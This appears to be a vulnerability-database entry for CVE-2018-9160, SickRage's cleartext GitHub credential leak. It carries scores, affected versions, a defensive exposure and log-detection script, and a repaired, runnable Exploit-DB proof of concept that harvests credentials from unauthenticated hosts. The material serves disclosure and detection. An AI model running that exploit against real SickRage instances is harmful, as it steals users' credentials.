CVE-2018-9160
Published 2018-03-31
CVE-2018-9160: SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
Priority P2 (75) · critical · CVSS 3.0 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: public (Exploit-DB, Metasploit)
EPSS: 76.52% (99.5th percentile)
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sickrage | sickrage | <= 9.2.101 | — |
| sickrage | sickrage | >= 0 < 2018.03.09-1 | 2018.03.09-1 |
| sickrage | sickrage | >= 0 < 8156a74a68aea930d1e1047baba8b115c3abfc44 | 8156a74a68aea930d1e1047baba8b115c3abfc44 |
| sickrage | sickrage | >= 0 < 9.3.2 | 9.3.2 |
Detection & IOCs (extracted from sources)
- Alert on unauthenticated HTTP GET requests to /config/general on SickRage instances; on a vulnerable build the response contains the stored GitHub credentials in cleartext, in HTML input fields with id='git_username' and id='git_password'.
- SickRage does not require login credentials by default, so /config/general is reachable without authentication. Monitor for unauthenticated access to this endpoint.
- Shodan can be used to identify exposed SickRage instances; attackers may pivot from Shodan lookups to credential harvesting against /config/general.
- The vulnerability only exposes credentials if the user has configured GitHub credentials in SickRage and has NOT set login protection on the SickRage web interface. Instances with web login credentials configured are not exploitable via unauthenticated access.
- The fix was introduced in v2018.03.09-1 (commit 8156a74a68aea930d1e1047baba8b115c3abfc44); the Metasploit module description references a later boundary of v2018-09-03, so the affected window should be verified against the specific build in use.
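The two observations above (the login-protection caveat and the /config/general request pattern) can be turned into concrete checks. The following is an added example, not code from the advisory, the Exploit-DB PoC or the SickRage project. It assumes the input-field ids cited above (git_username, git_password), that a login-protected instance answers an unauthenticated request with a redirect rather than a 200, and a combined-format web access log; the HTML fragments and log lines are constructed for the example.

```python
"""Exposure check and access-log detection for CVE-2018-9160.

Added example (not advisory, Exploit-DB or SickRage code). Assumptions:
  * an unprotected SickRage renders the stored GitHub credentials into
    <input id="git_username"> / <input id="git_password"> on /config/general;
  * a login-protected instance answers an unauthenticated request with a
    redirect to its login page (non-200), so the fields never reach the client;
  * the access log is in combined/common log format.
Sample HTML and log lines below are constructed for the example.
"""
import re
from html.parser import HTMLParser


class _InputCollector(HTMLParser):
    """Map every <input id=...> on a page to its value attribute."""

    def __init__(self):
        super().__init__()
        self.inputs = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attrs = dict(attrs)
        if attrs.get("id"):
            self.inputs[attrs["id"]] = attrs.get("value") or ""


def leaked_github_credentials(status, body):
    """Return (username, password) when an unauthenticated GET /config/general
    response discloses stored GitHub credentials, otherwise None.

    None covers the two non-vulnerable outcomes from the IOC notes: web login
    protection is on (the request is answered with a redirect, not 200), or no
    GitHub credentials are stored (the git_password field is rendered empty).
    """
    if status != 200:
        return None
    parser = _InputCollector()
    parser.feed(body)
    password = parser.inputs.get("git_password", "")
    if not password:
        return None
    return parser.inputs.get("git_username", ""), password


# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def flag_config_access(log_lines):
    """Return (ip, timestamp) for every GET /config/general answered with 200.

    On an instance without web login every such hit is an unauthenticated
    read of the credential-bearing page (the exact request the PoC makes);
    on a login-protected instance a 200 implies an authenticated session, so
    compare the source IPs against known administrator addresses.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        path = m.group("path").split("?", 1)[0].rstrip("/")
        if path == "/config/general" and m.group("status") == "200":
            hits.append((m.group("ip"), m.group("ts")))
    return hits


# --- constructed sample data -------------------------------------------------
EXPOSED_PAGE = (200, """<html><body><form>
<input type="text" name="git_username" id="git_username" value="octocat" />
<input type="password" name="git_password" id="git_password" value="hunter2" />
</form></body></html>""")

NO_CREDS_PAGE = (200, """<html><body><form>
<input type="text" name="git_username" id="git_username" value="" />
<input type="password" name="git_password" id="git_password" value="" />
</form></body></html>""")

# Login protection enabled: the unauthenticated request is redirected instead.
PROTECTED_PAGE = (302, '<html><body><a href="/login/">/login/</a></body></html>')

SAMPLE_LOG = [
    '203.0.113.7 - - [26/Apr/2018:10:15:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"',
    '203.0.113.7 - - [26/Apr/2018:10:15:02 +0000] "GET /config/general HTTP/1.1" 200 18342 "-" "python-requests/2.18.4"',
    '198.51.100.20 - - [26/Apr/2018:10:20:44 +0000] "GET /config/general/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [26/Apr/2018:11:02:10 +0000] "POST /config/general/saveGeneral HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("exposed:", leaked_github_credentials(*EXPOSED_PAGE))
    print("no creds:", leaked_github_credentials(*NO_CREDS_PAGE))
    print("protected:", leaked_github_credentials(*PROTECTED_PAGE))
    print("log hits:", flag_config_access(SAMPLE_LOG))
```

The exposure check is the defender's mirror of the PoC: feed it the status and body of a single unauthenticated GET to /config/general and it reports a leak only when the password field is actually populated, which separates a vulnerable-and-exploitable host from one that is merely unpatched. The log check is deliberately status-based rather than user-based, because SickRage's web login is cookie-based and does not populate the log's user field.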
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
GHSA · 2022-05-13
SiCKRAGE Discloses Plaintext Credentials (CVE-2018-9160, CRITICAL, CWE-522)
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
OSV · 2022-05-13
SiCKRAGE Discloses Plaintext Credentials (CVE-2018-9160, CRITICAL)
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
OSV · 2018-03-31
CVE-2018-9160: SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
No detection rules found.
Exploit-DB · 2018-04-26 · CVSS 9.8
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response (CVE-2018-9160, CRITICAL)
[...]
#3. Proof of Concept
```python
#!/usr/bin/env python3
# Exploit-DB 44545 PoC, repaired so it runs: the colorama import behind
# init(autoreset=True) was missing, the listing was cut off after the
# git_password lookup, and the Python 2 print statements and BeautifulSoup 3
# import are updated to Python 3 and bs4. Behaviour is unchanged: one
# unauthenticated GET to /config/general, then read the two input values.
import sys
import urllib3
import requests
from bs4 import BeautifulSoup
from colorama import init

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print("Usage: $ " + sys.argv[0] + " [IP_address] [port]")
    else:
        host = sys.argv[1]
        print("https://www.shodan.io/host/{0}".format(host))
        port = sys.argv[2]
        print("*** Get GitHub User credentials from SickRage ***")
        # No authentication is sent: /config/general is reachable unless a web login is configured
        url = "http://{0}:{1}/config/general".format(host, port)
        response = requests.get(url, timeout=5)
        parsed_html = BeautifulSoup(response.text, "html.parser")
        try:
            # The stored GitHub credentials are rendered into the form fields' value attributes
            git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value")
            git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value")
            print("git_username: {0}".format(git_username))
            print("git_password: {0}".format(git_password))
        except AttributeError:
            # find() returned None: the fields are absent (login page, or a fixed build)
            print("No GitHub credentials found in the response")
```
Metasploit
HTTP SickRage Password Leak
SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP responses unless the user has set login information for SickRage. By default, SickRage does not require login information for the installation.
No writeups or analysis indexed.
References
- https://github.com/SickRage/SickRage/commit/8156a74a68aea930d1e1047baba8b115c3abfc44
- https://github.com/SickRage/sickrage.github.io/blob/master/sickrage-news/CHANGES.md
- https://www.exploit-db.com/exploits/44545/
Published: 2018-03-31